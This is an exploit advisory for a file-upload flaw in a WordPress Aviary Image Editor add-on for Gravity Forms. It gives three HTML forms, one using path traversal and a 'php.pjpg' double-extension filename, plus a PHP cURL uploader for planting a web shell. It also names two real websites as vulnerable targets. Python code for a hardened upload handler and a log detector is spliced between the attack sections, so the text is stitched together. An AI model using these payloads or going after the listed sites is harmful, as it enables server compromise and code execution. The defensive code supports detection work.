####################################################################
# Exploit Title : WordPress Aviary Image Editor Add-On For Gravity Forms Plugins 3.0 Beta R7 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/03/2020
# Vendor Homepage : wordpress.org
# Software Link : wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms/
# Software Affected Version : 3.0 (Beta r7) and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
The Aviary Image Editor Add-on For Gravity Forms plugin for WordPress
is prone to an arbitrary-file-upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected
server; this can result in arbitrary code execution within the context of the
vulnerable application.
Aviary Image Editor Add-on For Gravity Forms 3.0 (beta) is vulnerable;
other versions may also be affected.
CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
client into making an unintentional request to the web server which will be treated as an
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
can result in exposure of data or unintended code execution.
CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and
other security features that are used to perform access control.
CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can
be automatically processed within the product's environment.
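The three CWE entries above describe checks that are missing from the endpoint. As an added illustration (not the plugin's code, and not WordPress's own API), the following Python models what a hardened upload handler does before writing anything: a per-user, per-action nonce so a forged cross-site POST fails (CWE-352), an explicit capability check (CWE-264), and validation of the client-supplied identifiers, filename, extension and content so that a double extension such as `.php.pjpg` or a path fragment such as `../../../` in `form_id` is refused (CWE-434). The `request` and `session` dictionaries, the `gform_aviary_upload` action name and the `upload_files` capability string are assumptions standing in for the WordPress equivalents (`wp_verify_nonce`, `current_user_can`).

```python
"""Hardened upload-request checks, modelled in Python (added example; the
request/session dicts and names are assumptions, not the plugin's API)."""
import hashlib
import hmac
import posixpath
import re
import secrets

# Per-deployment server secret used to bind nonces to a user and an action.
SECRET_KEY = secrets.token_bytes(32)

# Allow-list of extensions and the leading bytes each one must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# Identifiers that end up in a storage path must be plain tokens.
SAFE_TOKEN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def make_nonce(user_id: int, action: str) -> str:
    """HMAC over (user, action): the model of a wp_create_nonce-style token."""
    msg = f"{user_id}:{action}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def verify_nonce(user_id: int, action: str, nonce) -> bool:
    """Constant-time comparison; an absent or foreign nonce never verifies."""
    expected = make_nonce(user_id, action).encode()
    return hmac.compare_digest(expected, str(nonce or "").encode())


def validate_upload(request: dict, session: dict) -> tuple:
    """Return ("accepted", destination_path) or ("rejected", reason)."""
    # CWE-352 / CWE-264: anonymous or forged requests never reach the
    # file-writing code, and the user needs an explicit capability.
    if not session.get("user_id"):
        return ("rejected", "not authenticated")
    if not verify_nonce(session["user_id"], "gform_aviary_upload", request.get("nonce")):
        return ("rejected", "bad CSRF nonce")
    if "upload_files" not in session.get("capabilities", ()):
        return ("rejected", "missing capability")
    # "../../../" and "../../" fail this token check, so they can never
    # steer the destination directory.
    for field in ("form_id", "gform_unique_id"):
        if not SAFE_TOKEN.fullmatch(str(request.get(field, ""))):
            return ("rejected", f"invalid {field}")
    # CWE-434: exactly one extension, from the allow-list, and content that
    # matches it. "shell.php.pjpg" has two extensions and is refused outright.
    name = posixpath.basename(str(request.get("name", "")))
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in MAGIC:
        return ("rejected", "unsupported file type")
    ext = parts[1]
    if not request.get("data", b"").startswith(MAGIC[ext]):
        return ("rejected", "content does not match extension")
    # Never reuse the client-supplied name; store under a random one.
    stored = f"{secrets.token_hex(8)}.{ext}"
    dest = posixpath.join("wp-content/uploads/gform_aviary", request["form_id"], stored)
    return ("accepted", dest)
```

The order of the checks matters: authentication and the nonce are evaluated before any field is looked at, so an unauthenticated or forged request is rejected without the filename ever influencing control flow, and the stored name is generated server-side rather than derived from what the client sent.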
####################################################################
# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
# CSRF Cross Site Request Forgery Exploit 2 =>
****************************************
<html>
<head><title>WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter</title></head>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.php.pjpg" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
</body>
</html>
# CSRF Cross Site Request Forgery Exploit 3=>
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Aviary Image Editor Add-On For Gravity Forms Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
PHP Exploiter Code :
*********************
<?php
$uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# Vulnerability Error :
********************
{"status":"error","message":"Unsupported File Type. Supported files","code":null}
{"status":"error","message":"Unsupported File Type. Supported files"}
Directory File Path :
******************
/wp-content/uploads/gform_aviary/_[SHELL].php.pjpg
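For responders, the error messages and the upload path above give two things to look for: POSTs to the plugin's `upload.php` that do not originate from the site itself, and files under `wp-content/uploads/gform_aviary/` whose name carries an executable extension in a non-final position. The double extension matters because an Apache configuration that maps PHP with `AddHandler` examines every extension in a filename, not only the last one. The following Python is an added example, not part of the advisory: it parses Apache combined-format access-log lines for POSTs to the endpoint (classified by Referer origin) and for fetches of executable-looking files from the upload directory, and walks an uploads tree for such names. The log lines and the temporary directory are constructed for the example; the site host `www.example.com` is a placeholder.

```python
"""Detection helpers for the upload.php issue: log review and an uploads
directory sweep (added example; the log lines and files are constructed)."""
import os
import re
import tempfile
from urllib.parse import urlparse

UPLOAD_ENDPOINT = ("/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms"
                   "/includes/upload.php")
UPLOADS_DIR = "/wp-content/uploads/gform_aviary/"
# Extensions a PHP handler may execute if they appear anywhere in a filename.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def has_executable_segment(filename: str) -> bool:
    """True for 'x.php.pjpg' or 'x.phtml': any extension segment is executable."""
    return any(seg in EXEC_EXTS for seg in filename.lower().split(".")[1:])


def suspicious_log_entries(lines, site_host: str) -> list:
    """Flag POSTs to upload.php (by Referer origin) and fetches of
    executable-looking files under the plugin's upload directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, referer = m["path"], m["referer"]
        reason = None
        if m["method"] == "POST" and path.startswith(UPLOAD_ENDPOINT):
            if referer == "-":
                reason = "POST to upload.php without Referer"
            elif urlparse(referer).hostname != site_host:
                reason = "POST to upload.php from cross-site Referer"
            else:
                reason = "POST to upload.php (same-site, review)"
        elif path.startswith(UPLOADS_DIR) and has_executable_segment(os.path.basename(path)):
            reason = "request for executable-looking file in uploads"
        if reason:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "reason": reason})
    return hits


def find_suspicious_uploads(root: str) -> list:
    """Walk an uploads tree and return relative paths with an executable segment."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if has_executable_segment(name):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                found.append(rel.replace(os.sep, "/"))
    return sorted(found)


# Constructed sample log lines (RFC 5737 test addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Mar/2020:10:01:02 +0000] "POST ' + UPLOAD_ENDPOINT
    + ' HTTP/1.1" 200 87 "http://evil.example/csrf.html" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Mar/2020:10:02:10 +0000] "POST ' + UPLOAD_ENDPOINT
    + ' HTTP/1.1" 200 64 "-" "curl/7.64.0"',
    '192.0.2.9 - - [22/Mar/2020:10:03:00 +0000] "GET /wp-content/uploads/gform_aviary/'
    '_x.php.pjpg HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [22/Mar/2020:10:04:00 +0000] "POST ' + UPLOAD_ENDPOINT
    + ' HTTP/1.1" 200 70 "https://www.example.com/contact/" "Mozilla/5.0"',
    '192.0.2.11 - - [22/Mar/2020:10:05:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def build_sample_uploads() -> str:
    """Create a temporary gform_aviary-like tree (constructed) and return its path."""
    root = tempfile.mkdtemp(prefix="gform_aviary_")
    os.makedirs(os.path.join(root, "12"))
    for rel in ("_shell.php.pjpg", "photo.jpg", "img.phtml", "12/pic.png"):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(b"x")
    return root


if __name__ == "__main__":
    for hit in suspicious_log_entries(SAMPLE_LOG, "www.example.com"):
        print(hit)
    print(find_suspicious_uploads(build_sample_uploads()))
```

Same-site POSTs are still reported because the endpoint performs no authentication, so legitimate-looking origins do not prove legitimate use; a missing Referer is common for scripted clients like the PHP snippet above. Replace `SAMPLE_LOG` with the real access log and point `find_suspicious_uploads` at the site's `wp-content/uploads/gform_aviary` directory when running this on a host under review.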
####################################################################
# Example Vulnerable Sites :
************************
[+] solicitud.tenmas.es/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
[+] rbmlumber.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################